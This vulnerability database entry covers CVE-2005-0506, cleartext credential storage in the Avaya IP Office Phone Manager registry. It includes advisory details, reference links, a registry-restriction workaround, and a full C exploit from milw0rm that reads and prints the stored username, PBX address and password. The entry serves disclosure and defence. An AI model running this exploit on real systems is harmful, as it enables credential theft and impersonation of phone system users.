CVE-2005-0506
CVSS 5.0
Published: 2005-03-14 00:00:00
Revised: 2016-10-17 23:12:12

[Original] The Avaya IP Office Phone Manager, and other products such as the IP Softphone, stores sensitive data in cleartext in a registry key, which allows local and possibly remote users to steal usernames and passwords and impersonate other users via keys such as Avaya\IP400\Generic.


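[CNNVD] Avaya Sensitive Information Disclosure Vulnerability (CNNVD-200503-108)

        Avaya IP Office Phone Manager and other products such as IP Softphone store sensitive data in cleartext in registry keys. Local and possibly remote users can steal usernames and passwords through keys such as Avaya\IP400\Generic and impersonate other users.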

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:avaya:ip_office_phone_manager    Avaya IP Office Phone Manager
cpe:/a:avaya:ip_soft_phone    Avaya IP Softphone

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0506
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0506
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-108
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=110909733831694&w=2
(UNKNOWN)  BUGTRAQ  20050222 Avaya IP Office Phone Manager - Sensitive Information Cleartext
http://marc.info/?l=bugtraq&m=110910486128709&w=2
(UNKNOWN)  BUGTRAQ  20050222 Re: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability
http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf
(VENDOR_ADVISORY)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf

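- Vulnerability Information

Avaya Sensitive Information Disclosure Vulnerability
Medium risk  Unknown
2005-03-14 00:00:00 2005-10-20 00:00:00
Remote
        Avaya IP Office Phone Manager and other products such as IP Softphone store sensitive data in cleartext in registry keys. Local and possibly remote users can steal usernames and passwords through keys such as Avaya\IP400\Generic and impersonate other users.

- Advisories and Patches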

        

- Vulnerability Information (839)

Avaya IP Office Phone Manager Local Password Disclosure Exploit (EDBID:839)
windows local
2005-02-24 Verified
0 Adrian "pagvac" Pastor
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
    Filename:    exploit.c
    Title:       Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
    Author:      pagvac (Adrian Pastor)
    Date:        24th Feb, 2005
    Other info:  tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

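/* Reads one string value from HKLM\SOFTWARE\AVAYA\IP400\GENERIC into lszValData.
   Returns TRUE only if the key was opened and the value was read. */
BOOL QueryVal(const char *lszVal2Query, char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType = REG_SZ;
    DWORD dwSize = sizeof(lszResult) - 1;   /* leave room for a terminating NUL */

    returnStatus = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;                        /* key was not opened, so there is no handle to close */

    returnStatus = RegQueryValueExA(hKey, lszVal2Query, NULL, &dwType, (LPBYTE)lszResult, &dwSize);
    RegCloseKey(hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;                        /* value missing or unreadable: do not hand back stale data */

    lszResult[dwSize] = '\0';                /* registry strings are not guaranteed to be NUL-terminated */
    strcpy(lszValData, lszResult);
    return TRUE;
}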

int main(void)
{
    char valData[255];

    printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
    printf("By pagvac (Adrian Pastor)\n");
    printf("Tested on version 2.013\n\n");

    // Print username
    printf("Username:\t");
    if (!QueryVal("UserName", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print IP address
    printf("PBX IP Address:\t");
    if (!QueryVal("PBXAddress", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print password
    printf("Password:\t");
    if (!QueryVal("Password", valData))
        printf("Error! No permissions to read key value?\n");
    else
    {
        if (strcmp(valData, "") == 0)
            printf("[blank password]\n\n");
        else
        {
            printf("%s\n", valData);
            printf("Password obfuscated?\n\n");
        }
    }

    return 0;
}

// milw0rm.com [2005-02-24]
		

- Vulnerability Information

14206
Avaya IP Office Phone Manager Registry Cleartext Auth Credential Storage
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability Description

IP office phone manager contains a flaw that may lead to an unauthorized password exposure. It is possible for any local user to gain access to encrypted passwords that are stored in the registry, which may lead to a loss of confidentiality.

- Timeline

2005-02-22 Unknown
2005-02-22 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Restrict access to Windows registry and/or disable "Remember save password" feature.

- Related References

- Vulnerability Author
